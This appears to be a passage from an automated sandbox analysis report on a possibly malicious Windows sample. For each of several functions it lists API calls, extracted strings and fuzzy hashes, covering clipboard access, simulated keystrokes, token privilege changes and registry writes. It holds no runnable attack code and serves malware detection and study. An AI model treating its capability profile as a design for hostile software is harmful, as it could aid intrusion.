                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0090CE50
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CE91
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0090CED6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CF00
                                                  • SendMessageW.USER32 ref: 0090CF29
                                                  • _wcsncpy.LIBCMT ref: 0090CFA1
                                                  • GetKeyState.USER32(00000011), ref: 0090CFC2
                                                  • GetKeyState.USER32(00000009), ref: 0090CFCF
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CFE5
                                                  • GetKeyState.USER32(00000010), ref: 0090CFEF
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090D018
                                                  • SendMessageW.USER32 ref: 0090D03F
                                                  • SendMessageW.USER32(?,00001030,?,0090B602), ref: 0090D145
                                                  • SetCapture.USER32(?), ref: 0090D177
                                                  • ClientToScreen.USER32(?,?), ref: 0090D1DC
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090D203
                                                  • ReleaseCapture.USER32 ref: 0090D20E
                                                  • GetCursorPos.USER32(?), ref: 0090D248
                                                  • ScreenToClient.USER32(?,?), ref: 0090D255
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D2B1
                                                  • SendMessageW.USER32 ref: 0090D2DF
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D31C
                                                  • SendMessageW.USER32 ref: 0090D34B
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D36C
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D37B
                                                  • GetCursorPos.USER32(?), ref: 0090D39B
                                                  • ScreenToClient.USER32(?,?), ref: 0090D3A8
                                                  • GetParent.USER32(?), ref: 0090D3C8
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D431
                                                  • SendMessageW.USER32 ref: 0090D462
                                                  • ClientToScreen.USER32(?,?), ref: 0090D4C0
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D4F0
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D51A
                                                  • SendMessageW.USER32 ref: 0090D53D
                                                  • ClientToScreen.USER32(?,?), ref: 0090D58F
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D5C3
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090D65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 302779176-4164748364
                                                  • Opcode ID: ee5aae2eacdde7a6695aa04f530c3d1d242dcc823180b59b30fe33f143a29711
                                                  • Instruction ID: ef9134f9abb4c47caf73846163af60fb6fa9c83f9293f07a489f6efe115eb17b
                                                  • Opcode Fuzzy Hash: ee5aae2eacdde7a6695aa04f530c3d1d242dcc823180b59b30fe33f143a29711
                                                  • Instruction Fuzzy Hash: 5942ABB4208341AFD725CF68C858EAABBE9FF49314F14061DF699972E0C731AD41DB92
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0090873F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: 0d72e5b5287c8bcc00b2e578be3e066800f2f256a0e200d5445a6ad36ddba4ed
                                                  • Instruction ID: eafe5ce91a01892d6a5014e01d999a71ab0cd322ca33a3fdee66eb834fb81bd6
                                                  • Opcode Fuzzy Hash: 0d72e5b5287c8bcc00b2e578be3e066800f2f256a0e200d5445a6ad36ddba4ed
                                                  • Instruction Fuzzy Hash: 6512BD71604208AFEB258F28CC49FAF7BB8EF49710F204569F995EA2E1DF748941DB10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                                                  • Instruction ID: 66eb76c487330a0750d50357f48e998a98601f9afd1ad1088e9db0f26489ab5b
                                                  • Opcode Fuzzy Hash: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                                                  • Instruction Fuzzy Hash: 6B938171A04219DBDF24DF58D881BADB7B1FF58714F24826AE955EB380E7709E81CB40
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00884A3D
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BDA8E
                                                  • IsIconic.USER32(?), ref: 008BDA97
                                                  • ShowWindow.USER32(?,00000009), ref: 008BDAA4
                                                  • SetForegroundWindow.USER32(?), ref: 008BDAAE
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BDAC4
                                                  • GetCurrentThreadId.KERNEL32 ref: 008BDACB
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BDAD7
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAE8
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAF0
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BDAF8
                                                  • SetForegroundWindow.USER32(?), ref: 008BDAFB
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB10
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB1B
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB25
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB2A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB33
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB38
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB42
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB47
                                                  • SetForegroundWindow.USER32(?), ref: 008BDB4A
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 008BDB71
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                                                  • Instruction ID: 88758fc1e951f05b0a54820d3ea046e072891ba15a1df00319ae1a61bd539efd
                                                  • Opcode Fuzzy Hash: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                                                  • Instruction Fuzzy Hash: FF317371A5431CBFEB316FA19C49FBE7E6CEB44B60F114025FA04EA1D1D6B15A00BBA0
                                                  APIs
                                                  • OpenClipboard.USER32(0090F910), ref: 008F4284
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 008F4292
                                                  • GetClipboardData.USER32(0000000D), ref: 008F429A
                                                  • CloseClipboard.USER32 ref: 008F42A6
                                                  • GlobalFix.KERNEL32(00000000), ref: 008F42C2
                                                  • CloseClipboard.USER32 ref: 008F42CC
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 008F42E1
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 008F42EE
                                                  • GetClipboardData.USER32(00000001), ref: 008F42F6
                                                  • GlobalFix.KERNEL32(00000000), ref: 008F4303
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 008F4337
                                                  • CloseClipboard.USER32 ref: 008F4447
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                                                  • String ID:
                                                  • API String ID: 941120096-0
                                                  • Opcode ID: 987dda924b33b15a52d34ee85cce972767a458e4bd9b77222a096e1b3f4b2c6a
                                                  • Instruction ID: bf2fcffdc5052a9779fd581b26f62b7a30598ec8c738f331654d52c77ba4e19b
                                                  • Opcode Fuzzy Hash: 987dda924b33b15a52d34ee85cce972767a458e4bd9b77222a096e1b3f4b2c6a
                                                  • Instruction Fuzzy Hash: FC518E35208209AFD310FB68DC95F7F77A8FF84B10F10452AF696D22A1DB71DA059B62
                                                  APIs
                                                    • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                    • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                    • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                                                  • _memset.LIBCMT ref: 008D889B
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D88ED
                                                  • CloseHandle.KERNEL32(?), ref: 008D88FE
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D8915
                                                  • GetProcessWindowStation.USER32 ref: 008D892E
                                                  • SetProcessWindowStation.USER32(00000000), ref: 008D8938
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D8952
                                                    • Part of subcall function 008D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                                    • Part of subcall function 008D8713: CloseHandle.KERNEL32(?), ref: 008D873A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: 1dd7f984af4ed12ef0024a98f2515ccf2053df7891f8775599d524eba3bb53a3
                                                  • Instruction ID: 3d4f9b3e4906a60fd7efaa56eee893e41fefb9867025554157500de6ccc69ab5
                                                  • Opcode Fuzzy Hash: 1dd7f984af4ed12ef0024a98f2515ccf2053df7891f8775599d524eba3bb53a3
                                                  • Instruction Fuzzy Hash: D5814A71900219EFDF21DFA4DC45AEEBBB8FF04314F08426AF910E6261DB718E149B62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008EC9F8
                                                  • FindClose.KERNEL32(00000000), ref: 008ECA4C
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA71
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA88
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008ECAAF
                                                  • __swprintf.LIBCMT ref: 008ECAFB
                                                  • __swprintf.LIBCMT ref: 008ECB3E
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • __swprintf.LIBCMT ref: 008ECB92
                                                    • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                                                  • __swprintf.LIBCMT ref: 008ECBE0
                                                    • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A3953
                                                    • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A396B
                                                  • __swprintf.LIBCMT ref: 008ECC2F
                                                  • __swprintf.LIBCMT ref: 008ECC7E
                                                  • __swprintf.LIBCMT ref: 008ECCCD
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: fe4a89206ac7451b6b8a6dc55e490d5a0652c71511875b64df7159dc33053280
                                                  • Instruction ID: 789289d480e1ba0fc53c9a73f44b0f035655bfa318f50eb65e0170084dfa0b95
                                                  • Opcode Fuzzy Hash: fe4a89206ac7451b6b8a6dc55e490d5a0652c71511875b64df7159dc33053280
                                                  • Instruction Fuzzy Hash: 6FA13AB2508314ABC714FBA8C885DAFB7ECFF94704F440929F586C2191EA34DA09CB63
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 008EF221
                                                  • _wcscmp.LIBCMT ref: 008EF236
                                                  • _wcscmp.LIBCMT ref: 008EF24D
                                                  • GetFileAttributesW.KERNEL32(?), ref: 008EF25F
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 008EF279
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 008EF291
                                                  • FindClose.KERNEL32(00000000), ref: 008EF29C
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF2B8
                                                  • _wcscmp.LIBCMT ref: 008EF2DF
                                                  • _wcscmp.LIBCMT ref: 008EF2F6
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF308
                                                  • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF326
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF330
                                                  • FindClose.KERNEL32(00000000), ref: 008EF33D
                                                  • FindClose.KERNEL32(00000000), ref: 008EF34F
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                                                  • Instruction ID: 37daaf446db4afe04e9dcbe9cc1cc04075d321c273b6ba6a10aacc15858e4473
                                                  • Opcode Fuzzy Hash: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                                                  • Instruction Fuzzy Hash: 5931AE766002596EDB20DBA5DC58ADE73ACEF4A360F100176FA14D31A1EB30DB85DB50
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900BDE
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 00900C4C
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900C94
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900D1D
                                                  • RegCloseKey.ADVAPI32(?), ref: 0090103D
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0090104A
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 9232d8abb2c51f4a0ecc46b63ca614a137fbf43d56a360a458fb32ac073e6693
                                                  • Instruction ID: 9ef861fed063fc2d2941af8b2f10d08323f04c67732c5a71f738cccc23cd2a92
                                                  • Opcode Fuzzy Hash: 9232d8abb2c51f4a0ecc46b63ca614a137fbf43d56a360a458fb32ac073e6693
                                                  • Instruction Fuzzy Hash: FD023B752046119FDB14EF18C891E2ABBE5FF89714F04885DF98ADB6A2CB34ED41CB42
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 0090C917
                                                    • Part of subcall function 0090ADF1: ClientToScreen.USER32(?,?), ref: 0090AE1A
                                                    • Part of subcall function 0090ADF1: GetWindowRect.USER32(?,?), ref: 0090AE90
                                                    • Part of subcall function 0090ADF1: PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C980
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C98B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C9AE
                                                  • _wcscat.LIBCMT ref: 0090C9DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C9F5
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0090CA0E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA25
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA47
                                                  • DragFinish.SHELL32(?), ref: 0090CA4E
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0090CB41
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 2166380349-3440237614
                                                  • Opcode ID: c54808ed4a5c70c78e8ecc4177a9f1e17e85ed68b2e257832108a9c63119c7c2
                                                  • Instruction ID: dcb071adb37ad0560bf581424609046745eb2438cc217b5e87e51a61c0938040
                                                  • Opcode Fuzzy Hash: c54808ed4a5c70c78e8ecc4177a9f1e17e85ed68b2e257832108a9c63119c7c2
                                                  • Instruction Fuzzy Hash: 766149B2108301AFC711EF64CC85D9BBBE8FFC9714F400A2EF592961A1DB709A49CB52
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 008EF37E
                                                  • _wcscmp.LIBCMT ref: 008EF393
                                                  • _wcscmp.LIBCMT ref: 008EF3AA
                                                    • Part of subcall function 008E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E45DC
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 008EF3D9
                                                  • FindClose.KERNEL32(00000000), ref: 008EF3E4
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF400
                                                  • _wcscmp.LIBCMT ref: 008EF427
                                                  • _wcscmp.LIBCMT ref: 008EF43E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF450
                                                  • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF46E
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF478
                                                  • FindClose.KERNEL32(00000000), ref: 008EF485
                                                  • FindClose.KERNEL32(00000000), ref: 008EF497
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                                                  • Instruction ID: e0a710e4c2f9acfd2dc897598e3179e14166cd628844f5067034d050b53d2d61
                                                  • Opcode Fuzzy Hash: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                                                  • Instruction Fuzzy Hash: D331E4725002596FDB20AB69EC98ADE73ACEF4A368F100175F950E21E2D730DA44CB54
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C4EC
                                                  • GetFocus.USER32 ref: 0090C4FC
                                                  • GetDlgCtrlID.USER32(00000000), ref: 0090C507
                                                  • _memset.LIBCMT ref: 0090C632
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C65D
                                                  • GetMenuItemCount.USER32(?), ref: 0090C67D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 0090C690
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C6C4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C70C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C744
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0090C779
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 3616455698-4108050209
                                                  • Opcode ID: 0611594f9bf75acb9e32d6a3a6248eafcceba2710a13dec1eb27a79fb45667a8
                                                  • Instruction ID: b8802dccc7a9f6bbe5d7999d954b9dfcd8debccb969f1d5b1c528e05d5048587
                                                  • Opcode Fuzzy Hash: 0611594f9bf75acb9e32d6a3a6248eafcceba2710a13dec1eb27a79fb45667a8
                                                  • Instruction Fuzzy Hash: D3818BB5608301AFD720DF24C884A6BBBE8FF89314F100A2DF99597291D771E945DFA2
                                                  APIs
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                    • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                    • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                    • Part of subcall function 008D874A: RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                    • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                                    • Part of subcall function 008D87E7: RtlAllocateHeap.NTDLL(00000000,?,008D8240), ref: 008D87FA
                                                    • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D825B
                                                  • _memset.LIBCMT ref: 008D8270
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D828F
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D82A0
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 008D82DD
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D82F9
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D8316
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8325
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D832C
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D834D
                                                  • CopySid.ADVAPI32(00000000), ref: 008D8354
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8385
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D83AB
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D83BF
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 2347767575-0
                                                  • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                                  • Instruction ID: 6ecce5e3f2ffa4801e11e2d34a7f0feac3ffd49aa413f8db672e8b0c50cb6ee7
                                                  • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                                  • Instruction Fuzzy Hash: 3D615671904209EFDF14DFA4DC94AAEBBB9FF04B00F04822AE815E6391DB319A15DB60
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
